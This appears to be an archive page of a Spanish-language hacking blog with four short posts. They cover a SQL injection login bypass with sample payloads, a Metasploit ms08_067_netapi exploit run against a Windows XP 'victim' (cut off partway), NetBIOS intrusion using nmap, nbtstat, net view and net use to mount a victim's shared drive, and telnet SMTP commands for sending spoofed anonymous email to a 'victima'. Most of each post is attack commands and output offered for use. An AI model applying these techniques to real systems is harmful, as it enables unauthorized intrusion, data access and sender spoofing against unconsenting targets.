Archive for the ‘Hack’ Category

Lo Basico De SQLi

diciembre 29, 2011

Para bypassear un formulario un login basico seria sin nada de seguridar seria algo asi

SELECT * FROM admin WHERE usuario=’$usuario’ and password=’$pass’

El formulario no valida laas entradas del usuario, de modo que podemos hacer un sqli de la siguiente forma

admin’ or ‘x’=’x

quedando de la siguiente manera la COnsulta:

SELECT * FROM admin WHERE usuario=’admin’ or ‘x’=’x’ and password=’admin’ or ‘x’=’x’

Listo  Bypasseamos el Form XD…

 

Nota: otra opcion pude ser ‘ or 1=1 – (los guiones al final seria que el resto de la consulta quedaria “comentada” , por lo tanto esta no sera interpetada por la sentecia)

Saludos.

lNpl

Anuncios

Metasploit Windows Shell

diciembre 20, 2010

Hola este es un manual para entrar a una consola windows con ayuda de metasplot

========

Atacante Linux Ubuntu 192.168.1.106

Victima Windows Xp Sp3 192.168.1.108

=========

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > show options

msf exploit(ms08_067_netapi) > set rhost 192.168.1.108 ( ipvictima) (more…)

Intruducción por netbios

diciembre 20, 2010

Bueno primero lo que tenemos que hacer es estar en una red local,  vamos a mandar un escanneo de puertos a las Computadoras que esten conectadas a la Red:

Instalamos nmap

y ejecutamos lo siguiente:

nmap 192.168.1.*

ahora nos despliega una lista de todos los host conectados actuamente en la red localiza un objetivo el nuestro es  192.168.1.106

Mandamos un ping al objetivo

C:\Documents and Settings\Virtual>ping 192.168.1.106

Haciendo ping a 192.168.1.106 con 32 bytes de datos:

Respuesta desde 192.168.1.106: bytes=32 tiempo<1m TTL=64
Respuesta desde 192.168.1.106: bytes=32 tiempo=3ms TTL=64
Respuesta desde 192.168.1.106: bytes=32 tiempo=2ms TTL=64
Respuesta desde 192.168.1.106: bytes=32 tiempo=2ms TTL=64

Estadísticas de ping para 192.168.1.106:
Paquetes: enviados = 4, recibidos = 4, perdidos = 0
(0% perdidos)……

Un poco de teoria:

Nbtstat (NetBios Remote Machine Name Table)

Este comando sirve para obtener información de equipos remotos como:

nombre del host
IP
Puertos
estado

La sintaxis es:

nbtstat -a nombre del host [-modificadores] y también nbtstat -A dirección IP [-modificadores]

========================================

Bien entonces aplicamos el comando antes visto para ver informacion de equipo remoto

nbtstat -a 192.168.1.106

C:\Documents and Settings\Virtual>nbtstat -a 192.168.1.106

Conexión de área local:
Dirección IP: [192.168.1.106] Id. de ámbito : []

NetBIOS Remote Machine Name Table

Nombre               Tipo         Estado
———————————————
VIRTUAL-5F09021<00>  Único       Registrado
WORKGROUP      <00>  Grupo       Registrado
VIRTUAL-5F09021<20>  Único       Registrado
WORKGROUP      <1E>  Grupo       Registrado

Dirección MAC = xx-xx-xx-xx-xx-xx

Una breve explicacion de net view ( Si usasmos el comando net view con un nombre de equipo, aparecerá una lista de los recursos disponibles en ese equipo. )

net view \\trabajo
entonces vamos a usarlo de este modo

net view \\192.168.1.106

el resultado es algo similar a esto:

C:\Documents and Settings\Virtual>net view \\192.168.1.106
Recursos compartidos en \\192.168.1.106
Nombre de recurso compartido  Tipo   Usado como  Comentario

——————————————————————
Documentos                    Disco
Se ha completado el comando correctamente.

============================

Teorial:

net use  conecta un equipo a un recurso compartido o lo desconecta de un equipo de un recurso compartido. Si se usa sin opciones, muestra las conexiones del equipo.

net use z: \\192.168.1.106\C

Listo! estamos dentro

por ultimo para desconectarse de la carpeta compartida \\Documentos escribir :

net use z: \\192.168.1.106\Documentos /delete

Saludos

lNpl

Telnet para Mail Anonimo !!

enero 4, 2010

Crea una cuenta e-mail en gawab

en una Terminal escribe telnet y sigue estos pasos

telnet> open
(to) smtp.gawab.com 587
EHLO gawab
AUTH LOGIN
bnBhbm9uaW1vQGdhd2Fasdfasdf687a (mail en base 64)
asdfasdf6 (pass base 64)
Mail from:anonimo@jajaja.com
Rcpt to:victima@hotmail.com
DATA
Subject: ASUNTO MIO
Mail from:anonimo@jajaja.com
to:victima@hotmail.com
Este es un Mail de pruebas anonimas
.
quit

y si todo esta bien llegara tu mail.

 

Saludos
lNpl